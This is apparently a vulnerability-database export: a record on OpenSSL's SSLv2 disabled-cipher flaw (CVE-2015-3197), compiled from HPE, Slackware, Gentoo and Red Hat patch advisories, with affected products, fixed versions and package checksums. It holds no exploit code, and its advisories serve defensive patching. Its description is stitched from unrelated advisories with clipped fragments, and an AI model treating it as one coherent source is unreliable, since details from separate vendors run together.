"trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05111017" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4969" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05131044" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05130958" }, { "trust": 0.1, "url": "http://www.hpe.com/info/insightcontrol" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0207" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0118" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8142" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0226" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0231" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0285" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9653" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9705" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0232" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9427" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0208" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0273" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0231" }, { "trust": 0.1, "url": "http://www.hp.com/go/smh" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9652" }, { "trust": 0.1, "url": "http://www.hpe.com/info/insightmanagement" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2019" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2020" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2018" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2022" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2027" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2026" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2021" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0204" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0206" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-8275" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3572" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3571" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3570" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0205" }, { "db": "BID", "id": "71941" }, { "db": "JVNDB", "id": "JVNDB-2015-001010" }, { "db": "PACKETSTORM", "id": "129973" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "129870" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "137201" }, { "db": "PACKETSTORM", "id": "130051" }, { "db": "NVD", "id": "CVE-2015-0205" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2015-0205" }, { "db": "BID", "id": "71941" }, { "db": "JVNDB", "id": "JVNDB-2015-001010" }, { "db": "PACKETSTORM", "id": "129973" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "129870" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "137201" }, { "db": "PACKETSTORM", "id": "130051" }, { "db": "NVD", "id": "CVE-2015-0205" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-01-09T00:00:00", "db": "VULMON", "id": "CVE-2015-0205" }, { "date": "2015-01-08T00:00:00", "db": "BID", "id": "71941" }, { "date": "2015-01-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-001010" }, { "date": "2015-01-15T16:53:07", "db": "PACKETSTORM", "id": "129973" }, { "date": "2015-03-27T20:42:44", "db": "PACKETSTORM", "id": "131044" }, { "date": "2015-08-26T01:33:07", "db": "PACKETSTORM", "id": "133316" }, { "date": "2016-06-02T19:12:12", "db": "PACKETSTORM", "id": "137292" }, { "date": "2015-01-09T17:43:35", "db": "PACKETSTORM", "id": "129870" }, { "date": "2015-07-21T13:37:51", "db": "PACKETSTORM", "id": "132763" }, { "date": "2016-05-26T09:22:00", "db": "PACKETSTORM", "id": "137201" }, { "date": "2015-01-22T01:35:41", "db": "PACKETSTORM", "id": "130051" }, { "date": "2015-01-09T02:59:11.273000", "db": "NVD", "id": "CVE-2015-0205" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-11-15T00:00:00", "db": "VULMON", "id": "CVE-2015-0205" }, { "date": "2017-01-23T00:09:00", "db": "BID", "id": "71941" }, { "date": "2016-09-30T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-001010" }, { "date": "2017-11-15T02:29:05.890000", "db": "NVD", "id": "CVE-2015-0205" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "71941" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of s3_srvr.c of ssl3_get_cert_verify Vulnerability to gain access to functions", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-001010" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "71941" } ], "trust": 0.3 } }
var-201602-0272
Vulnerability from variot
ssl/s2_srvr.c in OpenSSL 1.0.1 before 1.0.1r and 1.0.2 before 1.0.2f does not prevent use of disabled ciphers, which makes it easier for man-in-the-middle attackers to defeat cryptographic protection mechanisms by performing computations on SSLv2 traffic, related to the get_client_master_key and get_client_hello functions. OpenSSL may generate unsafe primes for use in the Diffie-Hellman protocol, which may lead to disclosure of enough information for an attacker to recover the private encryption key. OpenSSL is prone to a security-bypass vulnerability. Successfully exploiting this issue may allow attackers to perform unauthorized actions. This may lead to other attacks. Cisco Unified Computing System Central Software is prone to an arbitrary command-execution vulnerability. An attacker can exploit this issue to execute system commands on the underlying operating system. This issue being tracked by Cisco Bug ID CSCut46961. Description:
Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05390893
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05390893 Version: 1
HPESBHF03703 rev.1 - HPE Network Products including Comware v7 and VCX using OpenSSL, Remote Unauthorized Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2017-02-14 Last Updated: 2017-02-14
Potential Security Impact: Remote: Unauthorized Disclosure of Information
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities with OpenSSL have been addressed in HPE Network Products including Comware v7 and VCX. The vulnerabilities could be remotely exploited resulting in disclosure of information.
References:
- CVE-2015-3197 - OpenSSL, Remote unauthorized disclosure of information
- CVE-2016-0701 - OpenSSL, Remote unauthorized disclosure of information
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- VCX Products all prior versions - impacted by CVE-2015-3197 only. Please refer to the RESOLUTION below for a list of updated products.
- Comware 7 (CW7) Products all prior versions - impacted by CVE-2015-3197 and CVE-2016-0701. Please refer to the RESOLUTION below for a list of updated products.
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2015-3197
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CVE-2016-0701
3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has made the following software updates to resolve the vulnerability in the Comware v7 and VCX products.
COMWARE 7 Products
- 12500 (Comware 7) - Version: R7377P01
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- 10500 (Comware 7) - Version: R7183
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG608A HP FlexFabric 11908-V Switch Chassis
- JG609A HP FlexFabric 11900 Main Processing Unit
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System Main Processing Unit
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- 12900 (Comware 7) - Version: R1150
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- 5900 (Comware 7) - Version: R2432P01
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG296A HP 5920AF-24XG Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG555A HP 5920AF-24XG TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- MSR1000 (Comware 7) - Version: R0306P30
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- MSR2000 (Comware 7) - Version: R0306P30
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- MSR3000 (Comware 7) - Version: R0306P30
- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG409A HP MSR3012 AC Router
- JG409B HPE MSR3012 AC Router
- JG861A HP MSR3024 TAA-compliant AC Router
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- MSR4000 (Comware 7) - Version: R0306P30
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- MSR95X - Version: R0306P30
- HP Network Products
- JH296A HPE MSR954 1GbE SFP 2GbE-WAN 4GbE-LAN CWv7 Router
- JH297A HPE MSR954-W 1GbE SFP (WW) 2GbE-WAN 4GbE-LAN Wireless 802.11n CWv7 Router
- JH298A HPE MSR954-W 1GbE SFP LTE (AM) 2GbE-WAN 4GbE-LAN Wireless 802.11n CWv7 Router
- JH299A HPE MSR954-W 1GbE SFP LTE (WW) 2GbE-WAN 4GbE-LAN Wireless 802.11n CWv7 Router
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- VSR (Comware 7) - Version: E0322P01
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- 7900 (Comware 7) - Version: R2150
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- 5130EI (Comware 7) - Version: R3113P02
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- 6125XLG - Version: R2432P01
- HP Network Products
- 711307-B21 HP 6125XLG Blade Switch
- 737230-B21 HP 6125XLG Blade Switch with TAA
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- 6127XLG - Version: R2432P01
- HP Network Products
- 787635-B21 HP 6127XLG Blade Switch Opt Kit
- 787635-B22 HP 6127XLG Blade Switch with TAA
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- Moonshot - Version: R2432P01
- HP Network Products
- 786617-B21 - HP Moonshot-45Gc Switch Module
- 704654-B21 - HP Moonshot-45XGc Switch Module
- 786619-B21 - HP Moonshot-180XGc Switch Module
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- 5700 (Comware 7) - Version: R2432P01
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- 5930 (Comware 7) - Version: R2432P01
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- 1950 (Comware 7) - Version: R3113P02
- HP Network Products
- JG960A HP 1950-24G-4XG Switch
- JG961A HP 1950-48G-2SFP+-2XGT Switch
- JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch
- JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- 7500 (Comware 7) - Version: R7183
- HP Network Products
- JD238C HP 7510 Switch Chassis
- JD239C HP 7506 Switch Chassis
- JD240C HP 7503 Switch Chassis
- JD242C HP 7502 Switch Chassis
- JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit
- JH208A HP 7502 Main Processing Unit
- JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- 5130HI - Version: R1120P07
- HP Network Products
- JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch
- JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch
- JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch
- JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- 5510HI - Version: R1120P07
- HP Network Products
- JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch
- JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch
- JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch
- JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch
- JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch
- CVEs
- CVE-2015-3197
- CVE-2016-0701
- VCX - Version: 9.8.19
- HP Network Products
- J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr
- J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr
- JC517A HP VCX V7205 Platform w/DL 360 G6 Server
- JE355A HP VCX V6000 Branch Platform 9.0
- JC516A HP VCX V7005 Platform w/DL 120 G6 Server
- JC518A HP VCX Connect 200 Primry 120 G6 Server
- J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr
- JE341A HP VCX Connect 100 Secondary
- JE252A HP VCX Connect Primary MIM Module
- JE253A HP VCX Connect Secondary MIM Module
- JE254A HP VCX Branch MIM Module
- JE355A HP VCX V6000 Branch Platform 9.0
- JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod
- JD023A HP MSR30-40 Router with VCX MIM Module
- JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM
- JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod
- JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod
- JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod
- JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS
- JE340A HP VCX Connect 100 Pri Server 9.0
- JE342A HP VCX Connect 100 Sec Server 9.0
- CVEs
- CVE-2015-3197
Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.
HISTORY Version:1 (rev.1) - 14 February 2017 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1r-i486-1_slack14.1.txz: Upgraded. This update fixes the following security issue: SSLv2 doesn't block disabled ciphers (CVE-2015-3197). +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1r-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1r-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1r-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1r-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1r-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1r-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1r-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1r-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2f-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2f-i586-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2f-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2f-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.0 packages: 0d6e8d3b27326c84b9996ed189868eba openssl-1.0.1r-i486-1_slack14.0.txz e3cb0b75e9df4be9d8fd1cfcd2fbd306 openssl-solibs-1.0.1r-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: 7b52f4a43b42703a6840945d55f503ee openssl-1.0.1r-x86_64-1_slack14.0.txz eee92cb549bacae21e63bee22b9bb8d4 openssl-solibs-1.0.1r-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 5be72ab551b2064aa34c83b42a07ff85 openssl-1.0.1r-i486-1_slack14.1.txz b28e00a7124822258cfd137ab5ce0572 openssl-solibs-1.0.1r-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: 8e0273b1e99e8caa48fcab2547f051e9 openssl-1.0.1r-x86_64-1_slack14.1.txz 60f3994c35679455cab7a984493d1fdb openssl-solibs-1.0.1r-x86_64-1_slack14.1.txz
Slackware -current packages: 509771b1f7d58a682feb2099fdf3eb5d a/openssl-solibs-1.0.2f-i586-1.txz d72c0188f4223d1dc2d6080f8d99d92e n/openssl-1.0.2f-i586-1.txz
Slackware x86_64 -current packages: 0c6653d3c37271f9f1a58a8c0e1f7b40 a/openssl-solibs-1.0.2f-x86_64-1.txz e4ebd1204644ea58e1779187fe071428 n/openssl-1.0.2f-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1r-i486-1_slack14.1.txz openssl-solibs-1.0.1r-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. 5.9 server) - i386, ia64, x86_64
-
Gentoo Linux Security Advisory GLSA 201601-05
https://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: January 29, 2016 Bugs: #572854 ID: 201601-05
Synopsis
Multiple vulnerabilities have been found in OpenSSL, allowing remote attackers to disclose sensitive information and complete weak handshakes.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.2f >= 1.0.2f
Description
Multiple vulnerabilities have been discovered in OpenSSL. Please review the upstream advisory and CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.2f"
References
[ 1 ] CVE-2015-3197 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3197 [ 2 ] CVE-2016-0701 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0701 [ 3 ] OpenSSL Security Advisory [28th Jan 2016] http://openssl.org/news/secadv/20160128.txt
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201601-05
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: openssl098e security update Advisory ID: RHSA-2016:0372-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0372.html Issue date: 2016-03-09 CVE Names: CVE-2015-0293 CVE-2015-3197 CVE-2016-0703 CVE-2016-0704 CVE-2016-0800 =====================================================================
- Summary:
Updated openssl098e packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
